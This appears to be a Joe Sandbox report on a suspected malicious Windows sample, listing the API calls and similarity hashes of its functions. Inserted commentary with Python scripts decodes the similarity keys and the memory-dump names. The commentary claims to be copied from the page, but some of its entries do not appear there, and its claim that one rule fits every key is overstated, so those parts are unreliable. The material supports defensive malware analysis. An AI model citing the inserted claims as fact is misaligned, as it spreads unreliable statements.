                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E361FB
                                                                      • __isleadbyte_l.LIBCMT ref: 00E36229
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E36257
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E3628D
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00E84F02
                                                                        • Part of subcall function 00E63641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E6365B
                                                                        • Part of subcall function 00E63641: GetCurrentThreadId.KERNEL32 ref: 00E63662
                                                                        • Part of subcall function 00E63641: AttachThreadInput.USER32(00000000,?,00E65005), ref: 00E63669
                                                                      • GetCaretPos.USER32(?), ref: 00E84F13
                                                                      • ClientToScreen.USER32(00000000,?), ref: 00E84F4E
                                                                      • GetForegroundWindow.USER32 ref: 00E84F54
                                                                      Similarity
                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                      • String ID:
                                                                      • API String ID: 2759813231-0
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • GetCursorPos.USER32(?), ref: 00E8C4D2
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E3B9AB,?,?,?,?,?), ref: 00E8C4E7
                                                                      • GetCursorPos.USER32(?), ref: 00E8C534
                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E3B9AB,?,?,?), ref: 00E8C56E
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      APIs
                                                                        • Part of subcall function 00E5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E58121
                                                                        • Part of subcall function 00E5810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E5812B
                                                                        • Part of subcall function 00E5810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E5813A
                                                                        • Part of subcall function 00E5810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58141
                                                                        • Part of subcall function 00E5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58157
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E586A3
                                                                      • _memcmp.LIBCMT ref: 00E586C6
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E586FC
                                                                      • HeapFree.KERNEL32(00000000), ref: 00E58703
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                      • String ID:
                                                                      • API String ID: 1592001646-0
                                                                      APIs
                                                                      • __setmode.LIBCMT ref: 00E209AE
                                                                        • Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E67896,?,?,00000000), ref: 00E05A2C
                                                                        • Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E67896,?,?,00000000,?,?), ref: 00E05A50
                                                                      • _fprintf.LIBCMT ref: 00E209E5
                                                                      • OutputDebugStringW.KERNEL32(?), ref: 00E55DBB
                                                                        • Part of subcall function 00E24AAA: _flsall.LIBCMT ref: 00E24AC3
                                                                      • __setmode.LIBCMT ref: 00E20A1A
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                      • String ID:
                                                                      • API String ID: 521402451-0
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E717A3
                                                                        • Part of subcall function 00E7182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E7184C
                                                                        • Part of subcall function 00E7182D: InternetCloseHandle.WININET(00000000), ref: 00E718E9
                                                                      Similarity
                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 1463438336-0
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,00E8FAC0), ref: 00E63A64
                                                                      • GetLastError.KERNEL32 ref: 00E63A73
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E63A82
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E8FAC0), ref: 00E63ADF
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00E35101
                                                                        • Part of subcall function 00E2571C: __FF_MSGBANNER.LIBCMT ref: 00E25733
                                                                        • Part of subcall function 00E2571C: __NMSG_WRITE.LIBCMT ref: 00E2573A
                                                                        • Part of subcall function 00E2571C: RtlAllocateHeap.NTDLL(01000000,00000000,00000001,00000000,?,?,?,00E20DD3,?), ref: 00E2575F
                                                                      Similarity
                                                                      • API ID: AllocateHeap_free
                                                                      • String ID:
                                                                      • API String ID: 614378929-0
                                                                      APIs
                                                                        • Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E67896,?,?,00000000), ref: 00E05A2C
                                                                        • Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E67896,?,?,00000000,?,?), ref: 00E05A50
                                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00E76399
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E763A4
                                                                      • _memmove.LIBCMT ref: 00E763D1
                                                                      • inet_ntoa.WSOCK32(?), ref: 00E763DC
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 1504782959-0
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E58B61
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58B73
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58B89
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58BA4
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 00E012D8
                                                                      • GetClientRect.USER32(?,?), ref: 00E3B5FB
                                                                      • GetCursorPos.USER32(?), ref: 00E3B605
                                                                      • ScreenToClient.USER32(?,?), ref: 00E3B610
                                                                      Similarity
                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 4127811313-0
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00E5D84D
                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00E5D864
                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00E5D879
                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00E5D897
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00E8B2E4
                                                                      • ScreenToClient.USER32(?,?), ref: 00E8B2FC
                                                                      • ScreenToClient.USER32(?,?), ref: 00E8B320
                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E8B33B
                                                                      Similarity
                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                      • String ID:
                                                                      • API String ID: 357397906-0
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00E66BE6
                                                                        • Part of subcall function 00E676C4: _memset.LIBCMT ref: 00E676F9
                                                                      • _memmove.LIBCMT ref: 00E66C09
                                                                      • _memset.LIBCMT ref: 00E66C16
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E66C26
                                                                      Similarity
                                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                      • String ID:
                                                                      • API String ID: 48991266-0
                                                                      APIs
                                                                      • GetSysColor.USER32(00000008), ref: 00E02231
                                                                      • SetTextColor.GDI32(?,000000FF), ref: 00E0223B
                                                                      • SetBkMode.GDI32(?,00000001), ref: 00E02250
                                                                      • GetStockObject.GDI32(00000005), ref: 00E02258
                                                                      • GetWindowDC.USER32(?,00000000), ref: 00E3BE83
                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E3BE90
                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00E3BEA9
                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00E3BEC2
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00E3BEE2
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00E3BEED
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1946975507-0
                                                                      • Opcode ID: 246934f5a23a873884cde93d60767c138e70d7f2f15cdb98f029142594603d08
                                                                      • Instruction ID: 89fac97e045ff6df93cf5ffef38f323bf99dd20fe0decc8d7c64ef3c7604a3ea
                                                                      • Opcode Fuzzy Hash: 246934f5a23a873884cde93d60767c138e70d7f2f15cdb98f029142594603d08
                                                                      • Instruction Fuzzy Hash: AFE03932604244EEDB215FAAEC4D7D83F10EB05336F108366FB6D680F287714994DB12
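The `API ID` under `Similarity` is the key Joe Sandbox uses to match a function against functions in other reports. Its construction is not documented on this page, but every `API ID` in this section is reproduced by one rule: split each API name on CamelCase, drop the module suffix and every token shorter than four characters (Get, Set, Sys, DC, Bk, Url, Net, Use, Ex, W), keep CRT helpers such as `_memset` as one token, count tokens over all listed calls (including `Part of subcall function` entries), then emit the count groups from most to least frequent separated by `$`, each group concatenated in ASCII sort order. The script below is an added example that reconstructs that key and checks it against the entries on this page; it is not Joe Sandbox's code, and the four-character cutoff and the leading-underscore rule are inferred assumptions that may not hold for API names not seen here.

```python
import re
from collections import Counter, defaultdict

# API lists copied from the "APIs" blocks on this page (ref: addresses and arguments dropped),
# keyed by the "API ID" the report prints for the same function.
PAGE_ENTRIES = {
    "Pixel$Color$ModeObjectReleaseStockTextWindow": [
        "GetSysColor.USER32", "SetTextColor.GDI32", "SetBkMode.GDI32", "GetStockObject.GDI32",
        "GetWindowDC.USER32", "GetPixel.GDI32", "GetPixel.GDI32", "GetPixel.GDI32",
        "GetPixel.GDI32", "ReleaseDC.USER32",
    ],
    "CurrentOpenProcessThreadToken": [
        "GetCurrentThread.KERNEL32", "OpenThreadToken.ADVAPI32",
        "GetCurrentProcess.KERNEL32", "OpenProcessToken.ADVAPI32",
    ],
    "Connection__itow__swprintf__wcsnicmp_wcscpy": [
        "_wcscpy.LIBCMT", "__itow.LIBCMT", "__swprintf.LIBCMT",
        "__wcsnicmp.LIBCMT", "WNetUseConnectionW.MPR",
    ],
    "GlobalMemorySleepStatus": ["Sleep.KERNEL32", "GlobalMemoryStatusEx.KERNEL32"],
    "_wcscmp$__fread_nolock": ["__fread_nolock.LIBCMT", "_wcscmp.LIBCMT", "_wcscmp.LIBCMT"],
    "CrackInternet_memset": ["_memset.LIBCMT", "InternetCrackUrlW.WININET"],
    "MessageSend": ["SendMessageW.USER32", "SendMessageW.USER32"],
    "Window$DestroyMove": ["DestroyWindow.USER32", "MoveWindow.USER32"],
    "InfoItemMenu_memset": ["_memset.LIBCMT", "GetMenuItemInfoW.USER32"],
}

# Assumption: tokens shorter than this are discarded. It is the smallest cutoff that removes
# every short token absent from the page's keys (Get, Set, Sys, DC, Bk, Url, Net, Use, Ex, W)
# while keeping "Open", "Mode", "Text" and "Item", which are present.
MIN_TOKEN_LEN = 4


def tokenize(api: str) -> list[str]:
    """Split 'GetPixel.GDI32' into ['Pixel']; CRT helpers ('_memset.LIBCMT') stay whole."""
    name = api.split(".", 1)[0]
    if name.startswith("_"):
        return [name]
    return [t for t in re.findall(r"[A-Z][a-z0-9]*", name) if len(t) >= MIN_TOKEN_LEN]


def api_id(apis: list[str]) -> str:
    """Rebuild the Similarity 'API ID' key for a function's API list."""
    counts = Counter(tok for api in apis for tok in tokenize(api))
    by_count: dict[int, list[str]] = defaultdict(list)
    for tok, n in counts.items():
        by_count[n].append(tok)
    # Most frequent group first; inside a group plain ASCII order ('_' sorts after 'Z').
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def check_page_entries() -> dict[str, str]:
    """Map each API ID printed on the page to the key recomputed from its API list."""
    return {key: api_id(apis) for key, apis in PAGE_ENTRIES.items()}


if __name__ == "__main__":
    for key, computed in check_page_entries().items():
        print("OK " if computed == key else "MISMATCH ", key, "->", computed)
```

Because the key discards argument values, call order and addresses, it is a coarse pivot: any function whose only listed calls are two `SendMessageW` invocations gets `MessageSend`, whatever message ids it sends, so treat a matching `API ID` as a lead for comparing the fuzzy hashes, not as proof of identical code.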
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 00E5871B
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E582E6), ref: 00E58722
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E582E6), ref: 00E5872F
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E582E6), ref: 00E58736
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      • Opcode ID: 852833ebab0700e9961a19db4c56369ab8c0d1158ca87f2e38e351abd768ad8c
                                                                      • Instruction ID: 23770d62be30e99d04327e919ea86f44e3fe00c5d955fc806c0e3409a52a4d8c
                                                                      • Opcode Fuzzy Hash: 852833ebab0700e9961a19db4c56369ab8c0d1158ca87f2e38e351abd768ad8c
                                                                      • Instruction Fuzzy Hash: 62E086366113119FD7205FB25D0CB563BACEF54796F244828F649F9060DA348449C750
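Every function in this section cites the same `Source File` dump and the same five `Associated` dumps. The dotted file names are themselves a memory map: the fourth field is the region base address, and the fifth and seventh fields take exactly the values of `MEMORY_BASIC_INFORMATION.Protect` (0x20 PAGE_EXECUTE_READ, 0x02 PAGE_READONLY, 0x04 PAGE_READWRITE) and `.Type` (0x01000000 MEM_IMAGE) from `winnt.h`, while the first two fields reappear in the IDA snapshot name `hcaresult_0_2_e00000_...` together with the module `Offset`. The decoder below is an added example, not Joe Sandbox tooling: the Protect/Type reading is an assumption that happens to fit every dump listed here, and the third, sixth and eighth fields are left undecoded because the page does not say what they are.

```python
import re
from dataclasses import dataclass

# winnt.h constants. Assumption: the fifth and seventh dotted fields of a .sdmp name carry
# MEMORY_BASIC_INFORMATION.Protect and .Type; all six dumps on this page decode cleanly that way.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PROTECT_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTE_PROTECTIONS = {0x10, 0x20, 0x40, 0x80}

# The six region dumps named in this report's "Memory Dump Source" blocks.
PAGE_DUMPS = [
    "00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp",
]

NAME_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


def decode_protect(value: int) -> str:
    """Protect value to its winnt.h name, e.g. 0x104 -> 'PAGE_READWRITE|PAGE_GUARD'."""
    base = value & 0xFF
    name = PAGE_PROTECT.get(base, f"UNKNOWN(0x{base:02x})")
    mods = [n for bit, n in PROTECT_MODIFIERS.items() if value & bit]
    return "|".join([name] + mods)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    dump_index: int
    dump_id: str      # third field: meaning not documented on the page, kept raw
    base: int
    protect_raw: int
    field6: str       # sixth field: undocumented, kept raw
    mem_type: str
    field8: str       # eighth field: undocumented, kept raw

    @property
    def protect(self) -> str:
        return decode_protect(self.protect_raw)

    @property
    def executable(self) -> bool:
        return (self.protect_raw & 0xFF) in EXECUTE_PROTECTIONS


def parse_dump_name(name: str) -> DumpRegion:
    m = NAME_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox region dump name: {name}")
    proc, dump, dump_id, base, prot, f6, mtype, f8 = m.groups()
    mtype_val = int(mtype, 16)
    return DumpRegion(
        process_index=int(proc, 16), dump_index=int(dump, 16), dump_id=dump_id,
        base=int(base, 16), protect_raw=int(prot, 16), field6=f6,
        mem_type=MEM_TYPE.get(mtype_val, f"UNKNOWN(0x{mtype_val:x})"), field8=f8,
    )


def memory_map(names: list[str]) -> list[DumpRegion]:
    """Regions sorted by base address, the order an analyst reads them in."""
    return sorted((parse_dump_name(n) for n in names), key=lambda r: r.base)


def executable_bases(names: list[str]) -> list[int]:
    """Bases of the regions worth disassembling or scanning with code-level YARA rules."""
    return [r.base for r in memory_map(names) if r.executable]


def snapshot_stem(region: DumpRegion, module_base: int, sample_name: str) -> str:
    """IDA plugin snapshot stem as printed on the page: hcaresult_<proc>_<dump>_<module base>_<sample>."""
    sample = sample_name.rsplit(".", 1)[0]
    return f"hcaresult_{region.process_index}_{region.dump_index}_{module_base:x}_{sample}"


if __name__ == "__main__":
    for r in memory_map(PAGE_DUMPS):
        print(f"{'X' if r.executable else ' '} {r.base:#010x} {r.protect:<24} {r.mem_type}")
```

Run on the page's names, the map shows one execute-mapped region at 0xE01000, one writable region at 0xEBE000 and read-only regions at 0xE00000, 0xE8F000, 0xEB4000 and 0xEC7000, all of type MEM_IMAGE. That is why every function here names the 0xE01000 dump as its `Source File`: it is the only region of the image that can hold code, and it is the one to load when re-disassembling or scanning the dump offline.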
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %
                                                                      • API String ID: 0-2291192146
                                                                      • Opcode ID: c242ea5c4c85d74c77002265b9930c708188ff88f80a5cf7fcabc9d3df04565a
                                                                      • Instruction ID: 4068472129475b3c9a30ecb7224b92d79de83e3c31c21ef0da473e55732b28a3
                                                                      • Opcode Fuzzy Hash: c242ea5c4c85d74c77002265b9930c708188ff88f80a5cf7fcabc9d3df04565a
                                                                      • Instruction Fuzzy Hash: 59B18C7190010A9BCF24EF94C885AEEBBB9FF44314F146026E952B72D1DB349EE5CB91
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __itow_s
                                                                      • String ID: xb$xb
                                                                      • API String ID: 3653519197-3775679291
                                                                      • Opcode ID: 7c0ed40e2c3100a5735539e9540b077b678bbb0a4cbe21c844eb4371fb59b872
                                                                      • Instruction ID: d15403c0c5d7036c08d41da9a0d97d69acf38ecf433b001b3d18083f4a346d8e
                                                                      • Opcode Fuzzy Hash: 7c0ed40e2c3100a5735539e9540b077b678bbb0a4cbe21c844eb4371fb59b872
                                                                      • Instruction Fuzzy Hash: 62B15E70A00209EFCB14DF54C891EAABBF9FF58304F54D569F949AB292DB31E981CB50
                                                                      APIs
                                                                        • Part of subcall function 00E1FC86: _wcscpy.LIBCMT ref: 00E1FCA9
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • __wcsnicmp.LIBCMT ref: 00E6B02D
                                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E6B0F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                      • String ID: LPT
                                                                      • API String ID: 3222508074-1350329615
                                                                      • Opcode ID: cb1807c16c7c414070401aad31f797f0f1392052003b4e9e9434af2136ca6f1e
                                                                      • Instruction ID: 8990ac2fa5fa2906603f801b962b60d422634546d94adf333e516efe108822a0
                                                                      • Opcode Fuzzy Hash: cb1807c16c7c414070401aad31f797f0f1392052003b4e9e9434af2136ca6f1e
                                                                      • Instruction Fuzzy Hash: 32616F75A40215EFCB14DF94D891EAEB7F8EB09350F109069F916FB292D770AE84CB90
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 00E12968
                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E12981
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemorySleepStatus
                                                                      • String ID: @
                                                                      • API String ID: 2783356886-2766056989
                                                                      • Opcode ID: 5df55f678c6009f7dddc415b6a8432d09837e902c7d547dbbb96d135270bd23a
                                                                      • Instruction ID: 407501e88f3aefc784990880112b07e6bc1bd2f87c96205e9551c590382e8fc5
                                                                      • Opcode Fuzzy Hash: 5df55f678c6009f7dddc415b6a8432d09837e902c7d547dbbb96d135270bd23a
                                                                      • Instruction Fuzzy Hash: 235157B14087449BD320EF14DC86BAFBBE8FB85340F41885DF2D8611A6DB709569CB66
                                                                      APIs
                                                                        • Part of subcall function 00E04F0B: __fread_nolock.LIBCMT ref: 00E04F29
                                                                      • _wcscmp.LIBCMT ref: 00E69824
                                                                      • _wcscmp.LIBCMT ref: 00E69837
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscmp$__fread_nolock
                                                                      • String ID: FILE
                                                                      • API String ID: 4029003684-3121273764
                                                                      • Opcode ID: 3cc3a508ccd473c5a5aac2516307af48af5657d2e8ee71758264e7b9cf795703
                                                                      • Instruction ID: a0d10f19a8a61fd74b863140fa4785382d7f1b46b80ad2e648ea1e221b63838c
                                                                      • Opcode Fuzzy Hash: 3cc3a508ccd473c5a5aac2516307af48af5657d2e8ee71758264e7b9cf795703
                                                                      • Instruction Fuzzy Hash: D341F571A4020ABADF219AE4DC45FEFB7FDEF85714F001069FA04B71C1DA71A9048B60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
